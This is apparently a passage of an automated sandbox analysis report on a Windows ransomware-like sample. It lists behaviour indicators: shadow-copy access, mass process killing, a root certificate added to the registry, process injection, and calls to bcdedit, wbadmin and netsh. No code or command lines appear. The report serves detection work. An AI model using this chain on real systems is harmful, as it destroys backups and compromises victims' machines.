N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\Explorer.EXE N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\8846.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\Admin\AppData\Local\Temp\8846.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 C:\Users\Admin\AppData\Local\Temp\8846.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\caf660d5a464070e4a488bb3d2153c90204f739e75684f4d8ed56de1062b2f87.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\caf660d5a464070e4a488bb3d2153c90204f739e75684f4d8ed56de1062b2f87.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\caf660d5a464070e4a488bb3d2153c90204f739e75684f4d8ed56de1062b2f87.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\caf660d5a464070e4a488bb3d2153c90204f739e75684f4d8ed56de1062b2f87.exe N/A
N/A N/A C:\Windows\system32\certreq.exe N/A
N/A N/A C:\Windows\system32\certreq.exe N/A
N/A N/A C:\Windows\system32\certreq.exe N/A
N/A N/A C:\Windows\system32\certreq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\84`.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\84`.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2256 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\caf660d5a464070e4a488bb3d2153c90204f739e75684f4d8ed56de1062b2f87.exe C:\Windows\system32\certreq.exe
PID 2256 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\caf660d5a464070e4a488bb3d2153c90204f739e75684f4d8ed56de1062b2f87.exe C:\Windows\system32\certreq.exe
PID 2256 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\caf660d5a464070e4a488bb3d2153c90204f739e75684f4d8ed56de1062b2f87.exe C:\Windows\system32\certreq.exe
PID 2256 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\caf660d5a464070e4a488bb3d2153c90204f739e75684f4d8ed56de1062b2f87.exe C:\Windows\system32\certreq.exe
PID 4464 wrote to memory of 3704 N/A C:\Users\Admin\AppData\Local\Microsoft\84`.exe C:\Users\Admin\AppData\Local\Microsoft\84`.exe
PID 4464 wrote to memory of 3704 N/A C:\Users\Admin\AppData\Local\Microsoft\84`.exe C:\Users\Admin\AppData\Local\Microsoft\84`.exe
PID 4464 wrote to memory of 3704 N/A C:\Users\Admin\AppData\Local\Microsoft\84`.exe C:\Users\Admin\AppData\Local\Microsoft\84`.exe
PID 4464 wrote to memory of 3704 N/A C:\Users\Admin\AppData\Local\Microsoft\84`.exe C:\Users\Admin\AppData\Local\Microsoft\84`.exe
PID 4464 wrote to memory of 3704 N/A C:\Users\Admin\AppData\Local\Microsoft\84`.exe C:\Users\Admin\AppData\Local\Microsoft\84`.exe
PID 4464 wrote to memory of 3704 N/A C:\Users\Admin\AppData\Local\Microsoft\84`.exe C:\Users\Admin\AppData\Local\Microsoft\84`.exe
PID 1048 wrote to memory of 5044 N/A C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe C:\Windows\system32\cmd.exe
PID 1048 wrote to memory of 5044 N/A C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe C:\Windows\system32\cmd.exe
PID 1048 wrote to memory of 4428 N/A C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe C:\Windows\system32\cmd.exe
PID 1048 wrote to memory of 4428 N/A C:\Users\Admin\AppData\Local\Microsoft\o{qOsfR.exe C:\Windows\system32\cmd.exe
PID 4428 wrote to memory of 1800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4428 wrote to memory of 1800 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 5044 wrote to memory of 1016 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 5044 wrote to memory of 1016 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4428 wrote to memory of 3980 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4428 wrote to memory of 3980 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 5044 wrote to memory of 3900 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 5044 wrote to memory of 3900 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 5044 wrote to memory of 2264 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 5044 wrote to memory of 2264 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 5044 wrote to memory of 3992 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 5044 wrote to memory of 3992 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 5044 wrote to memory of 972 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbadmin.exe
PID 5044 wrote to memory of 972 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\wbadmin.exe
PID 2572 wrote to memory of 1788 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8846.exe
PID 2572 wrote to memory of 1788 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\8846.exe
PID 2572 wrote to memory of 3320 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 2572 wrote to memory of 3320 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 2572 wrote to memory of 3320 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 2572 wrote to memory of 3320 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 1788 wrote to memory of 3548 N/A C:\Users\Admin\AppData\Local\Temp\8846.exe C:\Windows\system32\curl.exe
PID 1788 wrote to memory of 3548 N/A C:\Users\Admin\AppData\Local\Temp\8846.exe C:\Windows\system32\curl.exe
PID 2572 wrote to memory of 296 N/A C:\Windows\Explorer.EXE C:\Windows\explorer.exe
PID 2572 wrote to memory of 296 N/A C:\Windows\Explorer.EXE C:\Windows\explorer.exe
PID 2572 wrote to memory of 296 N/A C:\Windows\Explorer.EXE C:\Windows\explorer.exe
PID 2572 wrote to memory of 3744 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 2572 wrote to memory of 3744 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 2572 wrote to memory of 3744 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 2572 wrote to memory of 3744 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 1788 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\8846.exe C:\Windows\SYSTEM32\cmd.exe
PID 1788 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\8846.exe C:\Windows\SYSTEM32\cmd.exe
PID 1788 wrote to memory of 4400 N/A C:\Users\Admin\AppData\Local\Temp\8846.exe C:\Windows\system32\taskkill.exe
PID 1788 wrote to memory of 4400 N/A C:\Users\Admin\AppData\Local\Temp\8846.exe C:\Windows\system32\taskkill.exe
PID 2572 wrote to memory of 4912 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 2572 wrote to memory of 4912 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 2572 wrote to memory of 4912 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 2572 wrote to memory of 4912 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 1788 wrote to memory of 4296 N/A C:\Users\Admin\AppData\Local\Temp\8846.exe C:\Windows\system32\taskkill.exe
PID 1788 wrote to memory of 4296 N/A C:\Users\Admin\AppData\Local\Temp\8846.exe C:\Windows\system32\taskkill.exe
PID 1788 wrote to memory of 3928 N/A C:\Users\Admin\AppData\Local\Temp\8846.exe C:\Windows\system32\taskkill.exe
PID 1788 wrote to memory of 3928 N/A C:\Users\Admin\AppData\Local\Temp\8846.exe C:\Windows\system32\taskkill.exe
PID 2572 wrote to memory of 2836 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 2572 wrote to memory of 2836 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
PID 2572 wrote to memory of 2836 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\explorer.exe
